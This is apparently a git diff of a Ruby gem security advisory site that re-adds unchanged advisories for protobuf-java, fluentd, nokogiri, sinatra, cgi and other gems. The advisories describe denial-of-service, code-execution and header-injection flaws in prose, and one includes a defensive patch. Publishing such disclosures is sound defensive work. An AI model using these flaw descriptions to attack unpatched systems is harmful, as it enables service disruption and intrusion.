-  ghsa: h4h5-3hr4-j3g2
-  url: https://github.com/protocolbuffers/protobuf/security/advisories/GHSA-h4h5-3hr4-j3g2
-  title: protobuf-java has a potential Denial of Service issue
-  date: 2022-10-04
-  description: |
-    ## Summary
-    A potential Denial of Service issue in `protobuf-java` core and lite was
-    discovered in the parsing procedure for binary and text format data.
-    Input streams containing multiple instances of non-repeated [embedded
-    messages](http://developers.google.com/protocol-buffers/docs/encoding#embedded)
-    with repeated or unknown fields causes objects to be converted back-n-forth
-    between mutable and immutable forms, resulting in potentially long garbage
-    collection pauses.
-
-    Reporter: [OSS Fuzz](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=48771)
-
-    Affected versions: This issue affects both the Java full and lite Protobuf
-    runtimes, as well as Protobuf for Kotlin and JRuby, which themselves use the
-    Java Protobuf runtime.
-
-    ## Severity
-
-    [CVE-2022-3171](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3171)
-    Medium - CVSS Score: 5.7 (NOTE: there may be a delay in publication)
-
-    ## Remediation and Mitigation
-
-    Please update to the latest available versions of the following packages:
-
-    * protobuf-java (3.21.7, 3.20.3, 3.19.6, 3.16.3)
-    * protobuf-javalite (3.21.7, 3.20.3, 3.19.6, 3.16.3)
-    * protobuf-kotlin (3.21.7, 3.20.3, 3.19.6, 3.16.3)
-    * protobuf-kotlin-lite (3.21.7, 3.20.3, 3.19.6, 3.16.3)
-    * google-protobuf [JRuby gem only] (3.21.7, 3.20.3, 3.19.6)
-  cvss_v3: 5.7
-  patched_versions:
-  - "~> 3.16.3"
-  - "~> 3.19.6"
-  - "~> 3.20.3"
-  - ">= 3.21.7"
-  related:
-    url:
-    - https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=48771
-    - https://github.com/protocolbuffers/protobuf/releases/tag/v21.7
-    - https://github.com/protocolbuffers/protobuf/releases/tag/v3.16.3
-    - https://github.com/protocolbuffers/protobuf/releases/tag/v3.19.6
-    - https://github.com/protocolbuffers/protobuf/releases/tag/v3.20.3
----
+---
+layout: advisory
+title: 'CVE-2022-3171 (google-protobuf): protobuf-java has a potential Denial of Service
+  issue'
+comments: false
+categories:
+- google-protobuf
+- jruby
+advisory:
+  gem: google-protobuf
+  platform: jruby
+  cve: 2022-3171
+  ghsa: h4h5-3hr4-j3g2
+  url: https://github.com/protocolbuffers/protobuf/security/advisories/GHSA-h4h5-3hr4-j3g2
+  title: protobuf-java has a potential Denial of Service issue
+  date: 2022-10-04
+  description: |
+    ## Summary
+    A potential Denial of Service issue in `protobuf-java` core and lite was
+    discovered in the parsing procedure for binary and text format data.
+    Input streams containing multiple instances of non-repeated [embedded
+    messages](http://developers.google.com/protocol-buffers/docs/encoding#embedded)
+    with repeated or unknown fields causes objects to be converted back-n-forth
+    between mutable and immutable forms, resulting in potentially long garbage
+    collection pauses.
+
+    Reporter: [OSS Fuzz](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=48771)
+
+    Affected versions: This issue affects both the Java full and lite Protobuf
+    runtimes, as well as Protobuf for Kotlin and JRuby, which themselves use the
+    Java Protobuf runtime.
+
+    ## Severity
+
+    [CVE-2022-3171](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3171)
+    Medium - CVSS Score: 5.7 (NOTE: there may be a delay in publication)
+
+    ## Remediation and Mitigation
+
+    Please update to the latest available versions of the following packages:
+
+    * protobuf-java (3.21.7, 3.20.3, 3.19.6, 3.16.3)
+    * protobuf-javalite (3.21.7, 3.20.3, 3.19.6, 3.16.3)
+    * protobuf-kotlin (3.21.7, 3.20.3, 3.19.6, 3.16.3)
+    * protobuf-kotlin-lite (3.21.7, 3.20.3, 3.19.6, 3.16.3)
+    * google-protobuf [JRuby gem only] (3.21.7, 3.20.3, 3.19.6)
+  cvss_v3: 5.7
+  patched_versions:
+  - "~> 3.16.3"
+  - "~> 3.19.6"
+  - "~> 3.20.3"
+  - ">= 3.21.7"
+  related:
+    url:
+    - https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=48771
+    - https://github.com/protocolbuffers/protobuf/releases/tag/v21.7
+    - https://github.com/protocolbuffers/protobuf/releases/tag/v3.16.3
+    - https://github.com/protocolbuffers/protobuf/releases/tag/v3.19.6
+    - https://github.com/protocolbuffers/protobuf/releases/tag/v3.20.3
+---
diff --git a/advisories/_posts/2022-10-07-CVE-2022-39281.md b/advisories/_posts/2022-10-07-CVE-2022-39281.md
index 646ca062..be33bf20 100644
--- a/advisories/_posts/2022-10-07-CVE-2022-39281.md
+++ b/advisories/_posts/2022-10-07-CVE-2022-39281.md
@@ -1,58 +1,58 @@
----
-layout: advisory
-title: 'CVE-2022-39281 (fat_free_crm): Fat Free CRM vulnerable to Remote Denial of
-  Service via Tasks endpoint'
-comments: false
-categories:
-- fat_free_crm
-advisory:
-  gem: fat_free_crm
-  cve: 2022-39281
-  ghsa: p75c-5x3h-cxcg
-  url: https://github.com/fatfreecrm/fat_free_crm/security/advisories/GHSA-p75c-5x3h-cxcg
-  title: Fat Free CRM vulnerable to Remote Denial of Service via Tasks endpoint
-  date: 2022-10-07
-  description: |
-    ### Impact
-    An authenticated user can perform a remote Denial of Service attack against
-    Fat Free CRM.
-
-    This vulnerability has been assigned the CVE identifier: CVE-2022-39281
-
-    Affected versions: All
-    Not affected: None
-    Fixed versions: 0.20.1
-
-    All users running an affected release should either upgrade or apply the patch
-    immediately.
-
-    ### Releases
-    Fixed versions: 0.20.1 and above
-
-    ### Patches
-
-    If you are unable to upgrade immediately, you should apply the following
-    patch.
-
-    ```
-    diff --git a/app/models/polymorphic/task.rb b/app/models/polymorphic/task.rb
-    index d3d5c32c..7cdb24d6 100644
-    --- a/app/models/polymorphic/task.rb
-    +++ b/app/models/polymorphic/task.rb
-    @@ -189,6 +189,7 @@ class Task < ActiveRecord::Base
-       #----------------------------------------------------------------------------
-       def self.bucket_empty?(bucket, user, view = "pending")
-         return false if bucket.blank? || !ALLOWED_VIEWS.include?(view)
-    +    return false unless Setting.task_bucket.map(&:to_s).include?(bucket.to_s)
-
-         if view == "assigned"
-           assigned_by(user).send(bucket).pending.count
-    ```
-  cvss_v3: 6.5
-  patched_versions:
-  - ">= 0.20.1"
-  related:
-    url:
-    - https://github.com/fatfreecrm/fat_free_crm/commit/c85a2546348c2692d32f952c753f7f0b43d1ca71
-    - https://github.com/fatfreecrm/fat_free_crm/releases/tag/v0.20.1
----
+---
+layout: advisory
+title: 'CVE-2022-39281 (fat_free_crm): Fat Free CRM vulnerable to Remote Denial of
+  Service via Tasks endpoint'
+comments: false
+categories:
+- fat_free_crm
+advisory:
+  gem: fat_free_crm
+  cve: 2022-39281
+  ghsa: p75c-5x3h-cxcg
+  url: https://github.com/fatfreecrm/fat_free_crm/security/advisories/GHSA-p75c-5x3h-cxcg
+  title: Fat Free CRM vulnerable to Remote Denial of Service via Tasks endpoint
+  date: 2022-10-07
+  description: |
+    ### Impact
+    An authenticated user can perform a remote Denial of Service attack against
+    Fat Free CRM.
+
+    This vulnerability has been assigned the CVE identifier: CVE-2022-39281
+
+    Affected versions: All
+    Not affected: None
+    Fixed versions: 0.20.1
+
+    All users running an affected release should either upgrade or apply the patch
+    immediately.
+
+    ### Releases
+    Fixed versions: 0.20.1 and above
+
+    ### Patches
+
+    If you are unable to upgrade immediately, you should apply the following
+    patch.
+
+    ```
+    diff --git a/app/models/polymorphic/task.rb b/app/models/polymorphic/task.rb
+    index d3d5c32c..7cdb24d6 100644
+    --- a/app/models/polymorphic/task.rb
+    +++ b/app/models/polymorphic/task.rb
+    @@ -189,6 +189,7 @@ class Task < ActiveRecord::Base
+       #----------------------------------------------------------------------------
+       def self.bucket_empty?(bucket, user, view = "pending")
+         return false if bucket.blank? || !ALLOWED_VIEWS.include?(view)
+    +    return false unless Setting.task_bucket.map(&:to_s).include?(bucket.to_s)
+
+         if view == "assigned"
+           assigned_by(user).send(bucket).pending.count
+    ```
+  cvss_v3: 6.5
+  patched_versions:
+  - ">= 0.20.1"
+  related:
+    url:
+    - https://github.com/fatfreecrm/fat_free_crm/commit/c85a2546348c2692d32f952c753f7f0b43d1ca71
+    - https://github.com/fatfreecrm/fat_free_crm/releases/tag/v0.20.1
+---
diff --git a/advisories/_posts/2022-10-18-GHSA-2qc6-mcvw-92cw.md b/advisories/_posts/2022-10-18-GHSA-2qc6-mcvw-92cw.md
index c0fb56b2..bd9a1f02 100644
--- a/advisories/_posts/2022-10-18-GHSA-2qc6-mcvw-92cw.md
+++ b/advisories/_posts/2022-10-18-GHSA-2qc6-mcvw-92cw.md
@@ -1,95 +1,95 @@
----
-layout: advisory
-title: 'GHSA-2qc6-mcvw-92cw (nokogiri): Update bundled libxml2 to v2.10.3 to resolve
-  multiple CVEs'
-comments: false
-categories:
-- nokogiri
-advisory:
-  gem: nokogiri
-  ghsa: 2qc6-mcvw-92cw
-  url: https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-2qc6-mcvw-92cw
-  title: Update bundled libxml2 to v2.10.3 to resolve multiple CVEs
-  date: 2022-10-18
-  description: |
-    ### Summary
-
-    Nokogiri v1.13.9 upgrades the packaged version of its dependency libxml2 to
-    [v2.10.3](https://gitlab.gnome.org/GNOME/libxml2/-/releases/v2.10.3) from
-    v2.9.14.
-
-    libxml2 v2.10.3 addresses the following known vulnerabilities:
-
-    - [CVE-2022-2309](https://nvd.nist.gov/vuln/detail/CVE-2022-2309)
-    - [CVE-2022-40304](https://nvd.nist.gov/vuln/detail/CVE-2022-40304)
-    - [CVE-2022-40303](https://nvd.nist.gov/vuln/detail/CVE-2022-40303)
-
-    Please note that this advisory only applies to the CRuby implementation of
-    Nokogiri `< 1.13.9`, and only if the _packaged_ libraries are being used. If
-    you've overridden defaults at installation time to use _system_ libraries
-    instead of packaged libraries, you should instead pay attention to your
-    distro's `libxml2` release announcements.
-
-
-    ### Mitigation
-
-    Upgrade to Nokogiri `>= 1.13.9`.
-
-    Users who are unable to upgrade Nokogiri may also choose a more complicated
-    mitigation: compile and link Nokogiri against external libraries libxml2
-    `>= 2.10.3` which will also address these same issues.
-
-
-    ### Impact
-
-    #### libxml2 [CVE-2022-2309](https://nvd.nist.gov/vuln/detail/CVE-2022-2309)
-
-    - **CVSS3 score**: Under evaluation
-    - **Type**: Denial of service
-    - **Description**: NULL Pointer Dereference allows attackers to cause a denial
-    of service (or application crash). This only applies when lxml is used
-    together with libxml2 2.9.10 through 2.9.14. libxml2 2.9.9 and earlier are not
-    affected. It allows triggering crashes through forged input data, given a
-    vulnerable code sequence in the application. The vulnerability is caused by
-    the iterwalk function (also used by the canonicalize function). Such code
-    shouldn't be in wide-spread use, given that parsing + iterwalk would usually
-    be replaced with the more efficient iterparse function. However, an XML
-    converter that serialises to C14N would also be vulnerable, for example, and
-    there are legitimate use cases for this code sequence. If untrusted input is
-    received (also remotely) and processed via iterwalk function, a crash can be
-    triggered.
-
-    Nokogiri maintainers investigated at #2620 and determined this CVE does not
-    affect Nokogiri users.
-
-
-    #### libxml2 [CVE-2022-40304](https://nvd.nist.gov/vuln/detail/CVE-2022-40304)
-
-    - **CVSS3 score**: Unspecified upstream
-    - **Type**: Data corruption, denial of service
-    - **Description**: When an entity reference cycle is detected, the entity
-    content is cleared by setting its first byte to zero. But the entity content
-    might be allocated from a dict. In this case, the dict entry becomes corrupted
-    leading to all kinds of logic errors, including memory errors like
-    double-frees.
-
-    See https://gitlab.gnome.org/GNOME/libxml2/-/commit/644a89e080bced793295f61f18aac8cfad6bece2
-
-
-    #### libxml2 [CVE-2022-40303](https://nvd.nist.gov/vuln/detail/CVE-2022-40303)
-
-    - **CVSS3 score**: Unspecified upstream
-    - **Type**: Integer overflow
-    - **Description**: Integer overflows with XML_PARSE_HUGE
-
-    See https://gitlab.gnome.org/GNOME/libxml2/-/commit/c846986356fc149915a74972bf198abc266bc2c0
-  patched_versions:
-  - ">= 1.13.9"
-  related:
-    url:
-    - https://gitlab.gnome.org/GNOME/libxml2/-/releases
-    cve:
-    - 2022-2309
-    - 2022-40304
-    - 2022-40303
----
+---
+layout: advisory
+title: 'GHSA-2qc6-mcvw-92cw (nokogiri): Update bundled libxml2 to v2.10.3 to resolve
+  multiple CVEs'
+comments: false
+categories:
+- nokogiri
+advisory:
+  gem: nokogiri
+  ghsa: 2qc6-mcvw-92cw
+  url: https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-2qc6-mcvw-92cw
+  title: Update bundled libxml2 to v2.10.3 to resolve multiple CVEs
+  date: 2022-10-18
+  description: |
+    ### Summary
+
+    Nokogiri v1.13.9 upgrades the packaged version of its dependency libxml2 to
+    [v2.10.3](https://gitlab.gnome.org/GNOME/libxml2/-/releases/v2.10.3) from
+    v2.9.14.
+
+    libxml2 v2.10.3 addresses the following known vulnerabilities:
+
+    - [CVE-2022-2309](https://nvd.nist.gov/vuln/detail/CVE-2022-2309)
+    - [CVE-2022-40304](https://nvd.nist.gov/vuln/detail/CVE-2022-40304)
+    - [CVE-2022-40303](https://nvd.nist.gov/vuln/detail/CVE-2022-40303)
+
+    Please note that this advisory only applies to the CRuby implementation of
+    Nokogiri `< 1.13.9`, and only if the _packaged_ libraries are being used. If
+    you've overridden defaults at installation time to use _system_ libraries
+    instead of packaged libraries, you should instead pay attention to your
+    distro's `libxml2` release announcements.
+
+
+    ### Mitigation
+
+    Upgrade to Nokogiri `>= 1.13.9`.
+
+    Users who are unable to upgrade Nokogiri may also choose a more complicated
+    mitigation: compile and link Nokogiri against external libraries libxml2
+    `>= 2.10.3` which will also address these same issues.
+
+
+    ### Impact
+
+    #### libxml2 [CVE-2022-2309](https://nvd.nist.gov/vuln/detail/CVE-2022-2309)
+
+    - **CVSS3 score**: Under evaluation
+    - **Type**: Denial of service
+    - **Description**: NULL Pointer Dereference allows attackers to cause a denial
+    of service (or application crash). This only applies when lxml is used
+    together with libxml2 2.9.10 through 2.9.14. libxml2 2.9.9 and earlier are not
+    affected. It allows triggering crashes through forged input data, given a
+    vulnerable code sequence in the application. The vulnerability is caused by
+    the iterwalk function (also used by the canonicalize function). Such code
+    shouldn't be in wide-spread use, given that parsing + iterwalk would usually
+    be replaced with the more efficient iterparse function. However, an XML
+    converter that serialises to C14N would also be vulnerable, for example, and
+    there are legitimate use cases for this code sequence. If untrusted input is
+    received (also remotely) and processed via iterwalk function, a crash can be
+    triggered.
+
+    Nokogiri maintainers investigated at #2620 and determined this CVE does not
+    affect Nokogiri users.
+
+
+    #### libxml2 [CVE-2022-40304](https://nvd.nist.gov/vuln/detail/CVE-2022-40304)
+
+    - **CVSS3 score**: Unspecified upstream
+    - **Type**: Data corruption, denial of service
+    - **Description**: When an entity reference cycle is detected, the entity
+    content is cleared by setting its first byte to zero. But the entity content
+    might be allocated from a dict. In this case, the dict entry becomes corrupted
+    leading to all kinds of logic errors, including memory errors like
+    double-frees.
+
+    See https://gitlab.gnome.org/GNOME/libxml2/-/commit/644a89e080bced793295f61f18aac8cfad6bece2
+
+
+    #### libxml2 [CVE-2022-40303](https://nvd.nist.gov/vuln/detail/CVE-2022-40303)
+
+    - **CVSS3 score**: Unspecified upstream
+    - **Type**: Integer overflow
+    - **Description**: Integer overflows with XML_PARSE_HUGE
+
+    See https://gitlab.gnome.org/GNOME/libxml2/-/commit/c846986356fc149915a74972bf198abc266bc2c0
+  patched_versions:
+  - ">= 1.13.9"
+  related:
+    url:
+    - https://gitlab.gnome.org/GNOME/libxml2/-/releases
+    cve:
+    - 2022-2309
+    - 2022-40304
+    - 2022-40303
+---
diff --git a/advisories/_posts/2022-11-02-CVE-2022-39379.md b/advisories/_posts/2022-11-02-CVE-2022-39379.md
index 4b705b6d..d8ea58be 100644
--- a/advisories/_posts/2022-11-02-CVE-2022-39379.md
+++ b/advisories/_posts/2022-11-02-CVE-2022-39379.md
@@ -1,46 +1,46 @@
----
-layout: advisory
-title: 'CVE-2022-39379 (fluentd): fluentd vulnerable to remote code execution due
-  to insecure deserialization (in non-default configuration)'
-comments: false
-categories:
-- fluentd
-advisory:
-  gem: fluentd
-  cve: 2022-39379
-  ghsa: fppq-mj76-fpj2
-  url: https://github.com/fluent/fluentd/security/advisories/GHSA-fppq-mj76-fpj2
-  title: fluentd vulnerable to remote code execution due to insecure deserialization
-    (in non-default configuration)
-  date: 2022-11-02
-  description: |
-    ### Impact
-    A remote code execution (RCE) vulnerability in non-default configurations of
-    Fluentd allows unauthenticated attackers to execute arbitrary code via
-    specially crafted JSON payloads.
-
-    Fluentd setups are only affected if the environment variable
-    `FLUENT_OJ_OPTION_MODE` is explicitly set to `object`.
-
-    Please note: The option FLUENT_OJ_OPTION_MODE was introduced in Fluentd
-    version 1.13.2. Earlier versions of Fluentd are not affected by this
-    vulnerability.
-
-    ### Patches
-    v1.15.3
-
-    ### Workarounds
-    Do not use `FLUENT_OJ_OPTION_MODE=object`.
-
-    ### References
-    * GHSL-2022-067
-  cvss_v3: 3.1
-  unaffected_versions:
-  - "< 1.13.2"
-  patched_versions:
-  - ">= 1.15.3"
-  related:
-    url:
-    - https://securitylab.github.com/advisories/GHSL-2022-067_fluentd/
-    - https://github.com/fluent/fluentd/commit/48e5b85dab1b6d4c273090d538fc11b3f2fd8135
----
+---
+layout: advisory
+title: 'CVE-2022-39379 (fluentd): fluentd vulnerable to remote code execution due
+  to insecure deserialization (in non-default configuration)'
+comments: false
+categories:
+- fluentd
+advisory:
+  gem: fluentd
+  cve: 2022-39379
+  ghsa: fppq-mj76-fpj2
+  url: https://github.com/fluent/fluentd/security/advisories/GHSA-fppq-mj76-fpj2
+  title: fluentd vulnerable to remote code execution due to insecure deserialization
+    (in non-default configuration)
+  date: 2022-11-02
+  description: |
+    ### Impact
+    A remote code execution (RCE) vulnerability in non-default configurations of
+    Fluentd allows unauthenticated attackers to execute arbitrary code via
+    specially crafted JSON payloads.
+
+    Fluentd setups are only affected if the environment variable
+    `FLUENT_OJ_OPTION_MODE` is explicitly set to `object`.
+
+    Please note: The option FLUENT_OJ_OPTION_MODE was introduced in Fluentd
+    version 1.13.2. Earlier versions of Fluentd are not affected by this
+    vulnerability.
+
+    ### Patches
+    v1.15.3
+
+    ### Workarounds
+    Do not use `FLUENT_OJ_OPTION_MODE=object`.
+
+    ### References
+    * GHSL-2022-067
+  cvss_v3: 3.1
+  unaffected_versions:
+  - "< 1.13.2"
+  patched_versions:
+  - ">= 1.15.3"
+  related:
+    url:
+    - https://securitylab.github.com/advisories/GHSL-2022-067_fluentd/
+    - https://github.com/fluent/fluentd/commit/48e5b85dab1b6d4c273090d538fc11b3f2fd8135
+---
diff --git a/advisories/_posts/2022-11-18-CVE-2021-33621.md b/advisories/_posts/2022-11-18-CVE-2021-33621.md
index 89586b2f..49005bde 100644
--- a/advisories/_posts/2022-11-18-CVE-2021-33621.md
+++ b/advisories/_posts/2022-11-18-CVE-2021-33621.md
@@ -1,25 +1,25 @@
----
-layout: advisory
-title: 'CVE-2021-33621 (cgi): HTTP response splitting in CGI'
-comments: false
-categories:
-- cgi
-advisory:
-  gem: cgi
-  cve: 2021-33621
-  ghsa: vc47-6rqg-c7f5
-  url: https://www.ruby-lang.org/en/news/2022/11/22/http-response-splitting-in-cgi-cve-2021-33621/
-  title: HTTP response splitting in CGI
-  date: 2022-11-18
-  description: |
-    cgi.rb in Ruby through 2.6.x, through 3.0x, and through 3.1.x allows HTTP
-    header injection. If a CGI application using the CGI library inserts
-    untrusted input into the HTTP response header, an attacker can exploit it to
-    insert a newline character to split a header, and inject malicious content to
-    deceive clients.
-  cvss_v3: 8.8
-  patched_versions:
-  - "~> 0.1.0.2"
-  - "~> 0.2.2"
-  - ">= 0.3.5"
----
+---
+layout: advisory
+title: 'CVE-2021-33621 (cgi): HTTP response splitting in CGI'
+comments: false
+categories:
+- cgi
+advisory:
+  gem: cgi
+  cve: 2021-33621
+  ghsa: vc47-6rqg-c7f5
+  url: https://www.ruby-lang.org/en/news/2022/11/22/http-response-splitting-in-cgi-cve-2021-33621/
+  title: HTTP response splitting in CGI
+  date: 2022-11-18
+  description: |
+    cgi.rb in Ruby through 2.6.x, through 3.0x, and through 3.1.x allows HTTP
+    header injection. If a CGI application using the CGI library inserts
+    untrusted input into the HTTP response header, an attacker can exploit it to
+    insert a newline character to split a header, and inject malicious content to
+    deceive clients.
+  cvss_v3: 8.8
+  patched_versions:
+  - "~> 0.1.0.2"
+  - "~> 0.2.2"
+  - ">= 0.3.5"
+---
diff --git a/advisories/_posts/2022-11-19-CVE-2022-4064.md b/advisories/_posts/2022-11-19-CVE-2022-4064.md
index 7a1da3fd..9b8e3571 100644
--- a/advisories/_posts/2022-11-19-CVE-2022-4064.md
+++ b/advisories/_posts/2022-11-19-CVE-2022-4064.md
@@ -1,27 +1,27 @@
----
-layout: advisory
-title: 'CVE-2022-4064 (dalli): Unsanitized input leading to code injection in Dalli'
-comments: false
-categories:
-- dalli
-advisory:
-  gem: dalli
-  cve: 2022-4064
-  ghsa: 3xg8-cc8f-9wv2
-  url: https://github.com/petergoldstein/dalli/issues/932
-  title: Unsanitized input leading to code injection in Dalli
-  date: 2022-11-19
-  description: |
-    A vulnerability was found in Dalli. Affected is the function self.meta_set
-    of the file lib/dalli/protocol/meta/request_formatter.rb of the component Meta Protocol
-    Handler. The manipulation leads to injection. The exploit has been disclosed to
-    the public and may be used. The name of the patch is 48d594dae55934476fec61789e7a7c3700e0f50d.
-    It is recommended to apply a patch to fix this issue.
-  cvss_v3: 3.7
-  patched_versions:
-  - ">= 3.2.3"
-  related:
-    url:
-    - https://github.com/petergoldstein/dalli/pull/933
-    - https://github.com/petergoldstein/dalli/commit/48d594dae55934476fec61789e7a7c3700e0f50d
----
+---
+layout: advisory
+title: 'CVE-2022-4064 (dalli): Unsanitized input leading to code injection in Dalli'
+comments: false
+categories:
+- dalli
+advisory:
+  gem: dalli
+  cve: 2022-4064
+  ghsa: 3xg8-cc8f-9wv2
+  url: https://github.com/petergoldstein/dalli/issues/932
+  title: Unsanitized input leading to code injection in Dalli
+  date: 2022-11-19
+  description: |
+    A vulnerability was found in Dalli. Affected is the function self.meta_set
+    of the file lib/dalli/protocol/meta/request_formatter.rb of the component Meta Protocol
+    Handler. The manipulation leads to injection. The exploit has been disclosed to
+    the public and may be used. The name of the patch is 48d594dae55934476fec61789e7a7c3700e0f50d.
+    It is recommended to apply a patch to fix this issue.
+  cvss_v3: 3.7
+  patched_versions:
+  - ">= 3.2.3"
+  related:
+    url:
+    - https://github.com/petergoldstein/dalli/pull/933
+    - https://github.com/petergoldstein/dalli/commit/48d594dae55934476fec61789e7a7c3700e0f50d
+---
diff --git a/advisories/_posts/2022-11-30-CVE-2022-45442.md b/advisories/_posts/2022-11-30-CVE-2022-45442.md
index ae3053ab..b34f636e 100644
--- a/advisories/_posts/2022-11-30-CVE-2022-45442.md
+++ b/advisories/_posts/2022-11-30-CVE-2022-45442.md
@@ -1,29 +1,29 @@
----
-layout: advisory
-title: 'CVE-2022-45442 (sinatra): Sinatra vulnerable to Reflected File Download attack'
-comments: false
-categories:
-- sinatra
-advisory:
-  gem: sinatra
-  cve: 2022-45442
-  ghsa: 2x8x-jmrp-phxw
-  url: https://github.com/sinatra/sinatra/security/advisories/GHSA-2x8x-jmrp-phxw
-  title: Sinatra vulnerable to Reflected File Download attack
-  date: 2022-11-30
-  description: |
-    An issue was discovered in Sinatra 2.0 before 2.2.3 and 3.0 before 3.0.4.
-    An application is vulnerable to a reflected file download (RFD) attack that
-    sets the Content-Disposition header of a response when the filename is
-    derived from user-supplied input.
-  cvss_v3: 8.8
-  patched_versions:
-  - "~> 2.2.3"
-  - ">= 3.0.4"
-  related:
-    url:
-    - https://www.blackhat.com/docs/eu-14/materials/eu-14-Hafif-Reflected-File-Download-A-New-Web-Attack-Vector.pdf
-    - https://github.com/sinatra/sinatra/commit/ea8fc9495a350f7551b39e3025bfcd06f49f363b
-    ghsa:
-    - 8x94-hmjh-97hq
----
+---
+layout: advisory
+title: 'CVE-2022-45442 (sinatra): Sinatra vulnerable to Reflected File Download attack'
+comments: false
+categories:
+- sinatra
+advisory:
+  gem: sinatra
+  cve: 2022-45442
+  ghsa: 2x8x-jmrp-phxw
+  url: https://github.com/sinatra/sinatra/security/advisories/GHSA-2x8x-jmrp-phxw
+  title: Sinatra vulnerable to Reflected File Download attack
+  date: 2022-11-30
+  description: |
+    An issue was discovered in Sinatra 2.0 before 2.2.3 and 3.0 before 3.0.4.
+    An application is vulnerable to a reflected file download (RFD) attack that
+    sets the Content-Disposition header of a response when the filename is
+    derived from user-supplied input.
+  cvss_v3: 8.8
+  patched_versions:
+  - "~> 2.2.3"
+  - ">= 3.0.4"
+  related:
+    url:
+    - https://www.blackhat.com/docs/eu-14/materials/eu-14-Hafif-Reflected-File-Download-A-New-Web-Attack-Vector.pdf
+    - https://github.com/sinatra/sinatra/commit/ea8fc9495a350f7551b39e3025bfcd06f49f363b
+    ghsa:
+    - 8x94-hmjh-97hq
+---
diff --git a/advisories/_posts/2022-12-07-CVE-2022-23476.md b/advisories/_posts/2022-12-07-CVE-2022-23476.md
index a64f8fe0..2af83994 100644
--- a/advisories/_posts/2022-12-07-CVE-2022-23476.md
+++ b/advisories/_posts/2022-12-07-CVE-2022-23476.md
@@ -1,48 +1,48 @@
----
-layout: advisory
-title: 'CVE-2022-23476 (nokogiri): Unchecked return value from xmlTextReaderExpand'
-comments: false
-categories:
-- nokogiri
-advisory:
-  gem: nokogiri
-  cve: 2022-23476
-  ghsa: qv4q-mr5r-qprj
-  url: https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-qv4q-mr5r-qprj
-  title: Unchecked return value from xmlTextReaderExpand
-  date: 2022-12-07
-  description: |
-    ## Summary
-
-    Nokogiri `1.13.8, 1.13.9` fails to check the return value from `xmlTextReaderExpand` in the method `Nokogiri::XML::Reader#attribute_hash`. This can lead to a null pointer exception when invalid markup is being parsed.
-
-    For applications using `XML::Reader` to parse untrusted inputs, this may potentially be a vector for a denial of service attack.
-
-
-    ## Mitigation
-
-    Upgrade to Nokogiri `>= 1.13.10`.
-
-    Users may be able to search their code for calls to either `XML::Reader#attributes` or `XML::Reader#attribute_hash` to determine if they are affected.
-
-
-    ## Severity
-
-    The Nokogiri maintainers have evaluated this as [High Severity 7.5 (CVSS3.1)](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).
-
-
-    ## References
-
-    - [CWE - CWE-252: Unchecked Return Value (4.9)](https://cwe.mitre.org/data/definitions/252.html)
-    - [CWE - CWE-476: NULL Pointer Dereference (4.9)](https://cwe.mitre.org/data/definitions/476.html)
-
-
-    ## Credit
-
-    This vulnerability was responsibly reported by @davidwilemski.
-  cvss_v3: 7.5
-  unaffected_versions:
-  - "<= 1.13.7"
-  patched_versions:
-  - ">= 1.13.10"
----
+---
+layout: advisory
+title: 'CVE-2022-23476 (nokogiri): Unchecked return value from xmlTextReaderExpand'
+comments: false
+categories:
+- nokogiri
+advisory:
+  gem: nokogiri
+  cve: 2022-23476
+  ghsa: qv4q-mr5r-qprj
+  url: https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-qv4q-mr5r-qprj
+  title: Unchecked return value from xmlTextReaderExpand
+  date: 2022-12-07
+  description: |
+    ## Summary
+
+    Nokogiri `1.13.8, 1.13.9` fails to check the return value from `xmlTextReaderExpand` in the method `Nokogiri::XML::Reader#attribute_hash`. This can lead to a null pointer exception when invalid markup is being parsed.
+
+    For applications using `XML::Reader` to parse untrusted inputs, this may potentially be a vector for a denial of service attack.
+
+
+    ## Mitigation
+
+    Upgrade to Nokogiri `>= 1.13.10`.
+
+    Users may be able to search their code for calls to either `XML::Reader#attributes` or `XML::Reader#attribute_hash` to determine if they are affected.
+
+
+    ## Severity
+
+    The Nokogiri maintainers have evaluated this as [High Severity 7.5 (CVSS3.1)](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).
+
+
+    ## References
+
+    - [CWE - CWE-252: Unchecked Return Value (4.9)](https://cwe.mitre.org/data/definitions/252.html)
+    - [CWE - CWE-476: NULL Pointer Dereference (4.9)](https://cwe.mitre.org/data/definitions/476.html)
+
+
+    ## Credit
+
+    This vulnerability was responsibly reported by @davidwilemski.
+  cvss_v3: 7.5
+  unaffected_versions:
+  - "<= 1.13.7"
+  patched_versions:
+  - ">= 1.13.10"
+---
diff --git a/advisories/_posts/2022-12-13-CVE-2022-23514.md b/advisories/_posts/2022-12-13-CVE-2022-23514.md
index 11f30128..157112f9 100644
--- a/advisories/_posts/2022-12-13-CVE-2022-23514.md
+++ b/advisories/_posts/2022-12-13-CVE-2022-23514.md
@@ -1,29 +1,29 @@
----
-layout: advisory
-title: 'CVE-2022-23514 (loofah): Inefficient Regular Expression Complexity in Loofah'
-comments: false
-categories:
-- loofah
-advisory:
-  gem: loofah
-  cve: 2022-23514
-  ghsa: 486f-hjj9-9vhh
-  url: https://github.com/flavorjones/loofah/security/advisories/GHSA-486f-hjj9-9vhh
-  title: Inefficient Regular Expression Complexity in Loofah
-  date: 2022-12-13
-  description: |
-    ## Summary
-
-    Loofah `< 2.19.1` contains an inefficient regular expression that is susceptible to excessive backtracking when attempting to sanitize certain SVG attributes. This may lead to a denial of service through CPU resource consumption.
-
-    ## Mitigation
-
-    Upgrade to Loofah `>= 2.19.1`.
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 2.19.1"
-  related:
-    url:
-    - https://cwe.mitre.org/data/definitions/1333.html
-    - https://hackerone.com/reports/1684163
----
+---
+layout: advisory
+title: 'CVE-2022-23514 (loofah): Inefficient Regular Expression Complexity in Loofah'
+comments: false
+categories:
+- loofah
+advisory:
